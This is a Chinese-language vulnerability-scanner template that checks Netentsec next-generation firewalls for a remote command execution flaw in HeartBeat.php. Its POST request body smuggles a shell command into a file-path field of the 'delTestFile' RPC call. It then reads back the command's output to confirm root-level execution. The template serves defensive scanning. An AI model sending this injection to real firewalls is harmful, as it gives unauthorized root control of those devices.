漏洞描述
网康 下一代防火墙 HeartBeat.php文件存在远程命令执行漏洞,攻击者通过构造请求包即可获取服务器Root权限
app="网康科技-下一代防火墙"
id: netentsec-fiewall-heartbeat-php-rce
info:
name: 网康 下一代防火墙 HeartBeat.php 远程命令执行
author: zan8in
severity: high
verified: false
description: |
网康 下一代防火墙 HeartBeat.php文件存在远程命令执行漏洞,攻击者通过构造请求包即可获取服务器Root权限
app="网康科技-下一代防火墙"
tags: netentsec,rce,网康,firewall
created: 2025/03/19
set:
randstr: randomLowercase(6)
rules:
r0:
request:
method: POST
path: /directdata/direct/router
headers:
Content-Type: application/json
body: |
{"action":"NS_Rpc_HeartBeat","method":"delTestFile","data": ["/var/www/tmp/1.txt;id>{{randstr}}.txt"],"type":"rpc","tid":11,"f8839p7rqtj":"="}
expression: response.status == 200 && response.body.bcontains(b'"action":') && response.body.bcontains(b'"NS_Rpc_HeartBeat"')
r1:
request:
method: GET
path: /{{randstr}}.txt
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()